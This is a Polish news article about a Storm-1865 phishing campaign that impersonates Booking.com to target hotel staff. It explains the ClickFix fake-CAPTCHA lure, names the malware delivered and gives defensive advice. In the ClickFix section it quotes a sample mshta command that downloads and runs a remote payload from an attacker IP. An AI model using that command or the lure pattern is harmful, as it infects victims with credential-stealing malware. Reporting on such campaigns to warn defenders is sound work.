I po wymarzonym urlopie. Tak kradną na potęgę pieniądze gości i gospodarzy
Potencjalni klienci Booking.com padają ofiarą złożonej kampanii phishingowej, która od grudnia aktywnie atakuje organizacje z branży hotelarskiej. Poszkodowani są też właściciele obiektów.
Cyberatak wykorzystuje zaawansowane techniki inżynierii społecznej, aby dostarczać różnorodne złośliwe oprogramowanie kradnące dane uwierzytelniające. Ataki te są szczególnie niebezpieczne, ponieważ podszywają się pod renomowany portal Booking.com, co zwiększa ich wiarygodność w oczach potencjalnych ofiar. Złośliwe oprogramowanie dostarczane w ramach tej kampanii obejmuje kilka rodzin malware, w tym XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot i NetSupport RAT, które są wykorzystywane do kradzieży danych finansowych oraz uwierzytelniających w celu późniejszego dokonywania oszustw finansowych.
Czytaj też:
Ta grupa poluje na internautów już od dwóch lat. I jest bardzo skuteczna
Kampania phishingowa jest przypisywana grupie określanej przez Microsoft jako Storm-1865, odpowiedzialnej za prowadzenie ataków phishingowych prowadzących do kradzieży danych płatniczych i dokonywania nieautoryzowanych obciążeń finansowych. Działania tej grupy nasiliły się od początku 2023 r. i obejmują rozprzestrzenianie wiadomości za pośrednictwem platform takich jak internetowe biura podróży i platformy e-commerce, oraz usług poczty elektronicznej - w tym Gmail czy iCloud Mail.
Obecna kampania jest szczególnie ukierunkowana na organizacje z sektora hotelarskiego w Ameryce Północnej, Oceanii, Południowej i Południowo-Wschodniej Azji oraz Północnej, Południowej, Wschodniej i Zachodniej Europie, gdzie Booking.com jest szczególnie popularny.
Warto zauważyć, że grupa Storm-1865 ewoluuje w swoich metodach działania. W 2023 r. atakowała gości hotelowych korzystających z Booking.com, stosując zbliżone do siebie techniki inżynierii społecznej i złośliwe oprogramowanie. W 2024 r. celem grupy stali się kupujący na platformach e-commerce, którym przesyłano wiadomości phishingowe prowadzące do fałszywych stron płatności. Dodanie techniki ClickFix do arsenału taktyk, technik i procedur (TTP) tej grupy pokazuje, jak Storm-1865 rozwija swoje łańcuchy ataków, aby omijać konwencjonalne środki bezpieczeństwa przeciwko phishingowi i złośliwemu oprogramowaniu.
Co to jest ClickFix?
Mechanizm działania ataku jest szczególnie interesujący z technicznego punktu widzenia. Rozpoczyna się od wysłania złośliwej wiadomości e-mail, która podszywa się pod Booking.com. Treść tych wiadomości jest zróżnicowana i może dotyczyć negatywnych recenzji gości, próśb od potencjalnych gości, możliwości promocji online, weryfikacji konta i wielu innych tematów. Ta różnorodność tematyczna zwiększa szansę na skuteczne zaangażowanie ofiary, gdyż atakujący mogą dostosować treść do potencjalnych obaw lub zainteresowań pracowników branży hotelarskiej.
Wiadomości zawierają link lub załącznik PDF z linkiem, który rzekomo prowadzi do strony Booking.com. Po kliknięciu linku użytkownik jest przekierowywany na stronę internetową wyświetlającą fałszywy CAPTCHA nałożony na subtelnie widoczne tło zaprojektowane tak, aby imitować legalną stronę Booking.com. Ta strona stwarza iluzję, że Booking.com stosuje dodatkowe kontrole weryfikacyjne, co może dać atakowanemu użytkownikowi fałszywe poczucie bezpieczeństwa.
Kluczowym elementem ataku jest zastosowanie techniki inżynierii społecznej o nazwie ClickFix. W tej technice atakujący próbuje wykorzystać ludzką tendencję do rozwiązywania problemów, wyświetlając fałszywe komunikaty o błędach lub instrukcje, które polecają użytkownikom naprawić problemy poprzez kopiowanie, wklejanie i uruchamianie poleceń, co ostatecznie prowadzi do pobrania złośliwego oprogramowania. Ten wymóg interakcji użytkownika może pozwolić atakowi na ominięcie konwencjonalnych i automatycznych funkcji zabezpieczeń.
W przypadku tej kampanii phishingowej użytkownik jest proszony o użycie skrótu klawiaturowego w celu otwarcia okna Windows Run (Uruchom), a następnie wklejenie i uruchomienie polecenia, które strona phishingowa dodaje do schowka. Polecenie to pobiera i uruchamia złośliwy kod za pomocą mshta.exe, narzędzia systemowego Windows, które pozwala na wykonywanie skryptów HTML. Przykładowe polecenie może wyglądać następująco: mshta http ://92.255.57.155/Capcha.html # 'I am not a robot - reCAPTCHA Verification ID: 3781'.
Nieuważne rezerwacje hoteli i apartamentów, pobieżna weryfikacja gości. Jakie szkody może wyrządzić złośliwe oprogramowanie?
Atak wykorzystuje wiele rodzin popularnego złośliwego oprogramowania, w tym XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot i NetSupport RAT. W zależności od konkretnego ładunku kod uruchamiany przez mshta.exe może się różnić. Niektóre próbki pobierały skrypty PowerShell, JavaScript lub pliki wykonywalne.
Wszystkie mają możliwości kradzieży danych finansowych i uwierzytelniających w celu oszukańczego wykorzystania, co jest charakterystyczne dla działalności Storm-1865. Złośliwe oprogramowanie wykorzystywane w tej kampanii jest szczególnie niebezpieczne ze względu na swoje wszechstronne możliwości. Malware typu stealer, taki jak Lumma, specjalizuje się w kradzieży haseł, plików cookie, danych kart kredytowych i innych poufnych informacji z przeglądarek internetowych. Z kolei narzędzia zdalnego dostępu (RAT), takie jak AsyncRAT, VenomRAT i NetSupport RAT, pozwalają atakującym na pełną kontrolę nad zainfekowanym systemem, w tym możliwość monitorowania działań użytkownika, pobierania dodatkowego złośliwego oprogramowania czy eksfiltracji wrażliwych danych.
Danabot, będący jednym z bardziej zaawansowanych złośliwych programów wykorzystywanych w tym ataku, jest modułowym bankowym trojanem, który może być dostosowany do różnych celów, w tym kradzieży danych bankowych, rejestrowania naciśnięć klawiszy czy działania jako furtka dla innego złośliwego oprogramowania. Ta różnorodność złośliwego oprogramowania pokazuje, jak elastyczni i przygotowani są atakujący w swoich działaniach przeciwko organizacjom z branży hotelarskiej.
Microsoft wykrył tę operację. I ma nieco do skomentowania
Dla użytkowników kluczowe jest sprawdzanie adresu e-mail nadawcy, aby upewnić się, że jest legalny. Przydatne jest także najechanie kursorem na adres, aby upewnić się, że pełny adres jest prawidłowy. Ważne jest również, aby pamiętać, że legalne organizacje nie wysyłają niezamówionych wiadomości e-mail ani nie wykonują niezamówionych połączeń telefonicznych w celu prośby o dane osobowe lub finansowe. W przypadku otrzymania podejrzanej wiadomości e-mail lub komunikatu najlepiej skontaktować się bezpośrednio z dostawcą usług, korzystając z oficjalnych formularzy kontaktowych wymienionych na oficjalnej stronie internetowej.
Kampania phishingowa podszywająca się pod Booking.com stanowi poważne zagrożenie dla organizacji z branży hotelarskiej i pokazuje rosnącą złożoność ataków phishingowych. Wykorzystanie techniki ClickFix i różnorodnych rodzin złośliwego oprogramowania świadczy o zaawansowaniu atakujących i ich zdolności do adaptacji do zmieniających się środków bezpieczeństwa.
Dla specjalistów ds. bezpieczeństwa informatycznego i administratorów systemów w branży hotelarskiej kluczowe jest zrozumienie mechanizmów działania tych ataków i wdrożenie zalecanych środków zapobiegawczych. Edukacja użytkowników w zakresie rozpoznawania phishingu, wdrożenie uwierzytelniania wieloczynnikowego oraz wykorzystanie zaawansowanych narzędzi ochrony (Microsoft po swojej stronie rekomenduje Defender XDR i Sentinel) może znacząco zmniejszyć ryzyko skutecznego ataku.
Co ważne, branża hotelarska powinna spodziewać się dalszej ewolucji tych zagrożeń. Grupa Storm-1865 już pokazała swoją zdolność do adaptacji i rozwijania nowych wektorów ataku. W przyszłości możemy spodziewać się jeszcze bardziej wyrafinowanych technik inżynierii społecznej i nowych rodzajów złośliwego oprogramowania. Stała czujność, regularne aktualizacje systemów bezpieczeństwa i współpraca w zakresie wymiany informacji o zagrożeniach będą kluczowe dla skutecznej obrony przed tymi atakami.
